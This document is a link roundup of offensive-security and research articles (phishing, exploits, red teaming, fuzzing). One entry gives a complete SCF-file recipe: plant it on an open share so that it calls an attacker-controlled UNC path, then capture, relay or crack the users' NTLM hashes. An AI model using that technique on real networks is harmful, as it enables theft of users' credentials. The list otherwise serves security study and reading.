Round of use Winrm code execution XML – Matt harr0ey – Medium
https://medium.com/@mattharr0ey/round-of-use-winrm-code-execution-xml-6e3219d3e31

Obfuscation Techniques used in Phishing Attacks - redteamsec
https://www.reddit.com/r/redteamsec/comments/ampngj/obfuscation_techniques_used_in_phishing_attacks/

Tribe of Hackers: Free PDF Version - Threatcare
https://www.threatcare.com/tribe-of-hackers-free-pdf/

The Lazy Hacker – securit.ie
https://securit.ie/blog/?p=86

Need creds on a local network? Found an open network share?

1) Create an scf file with the following: 
[Shell] Command=2 IconFile=\\X.X.X.X\share\test.ico 
[Taskbar] Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy

Automation In Red Teaming – Red Teaming with a Blue Team Mentaility – Medium
https://medium.com/red-teaming-with-a-blue-team-mentaility/automation-in-red-teaming-32363e3a50d

Mass Cracking Cybrary Accounts – Somdev Sangwan
https://s0md3v.github.io/mass-cracking-cybrary-accounts/

Reverse RDP Attack: Code Execution on RDP Clients - Check Point Research
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/

Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans - Cofense
https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/

Notes on fuzzing ImageMagick and GraphicsMagick - The Blagoblag
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/

Bypass Application Whitelisting using Weak Path Rule
https://www.hackingarticles.in/bypass-application-whitelisting-using-weak-path-rule/

Qealler – a new JAR-based information stealer | Zscaler Blog
https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer

Clever Phishing Attack Enlists Google Translate to Spoof Login Page | Threatpost | The first stop for security news
https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/

[PoC] [CVE-2018-18354] Chrome remote code execution attack chain

Ignore Sandbox , Ignore Applock , Ignore download restriction
combined 3 bugs into logical vulnerability attack chain

https://t.co/IUWnx1mgZM

How Android Q improves privacy and permission controls over Android Pie
https://www.xda-developers.com/android-q-privacy-permission-controls/

ClusterFuzz, an infrastructure used for fuzzing Chrome and OSS-Fuzz, is open source now! Enjoy responsibly :)
Blog: https://t.co/v6ywgccmRH
Code: https://t.co/lO9ACd7FY8

Remote Code Execution via Path Traversal in the Device Metadata Authoring Wizard
https://posts.specterops.io/remote-code-execution-via-path-traversal-in-the-device-metadata-authoring-wizard-a0d5839fc54f

DnsCache. reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver
https://t.co/YDhPvp9LKU

Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375) | IOActive
https://ioactive.com/discovering-and-exploiting-a-vulnerability-in-androids-personal-dictionary/

Frida 12.3 Debuts New Crash Reporting Feature - NowSecure
https://www.nowsecure.com/blog/2019/02/07/frida-12-3-debuts-new-crash-reporting-feature/

A guide to HTTP security headers for better web browser security | Detectify Blog
https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/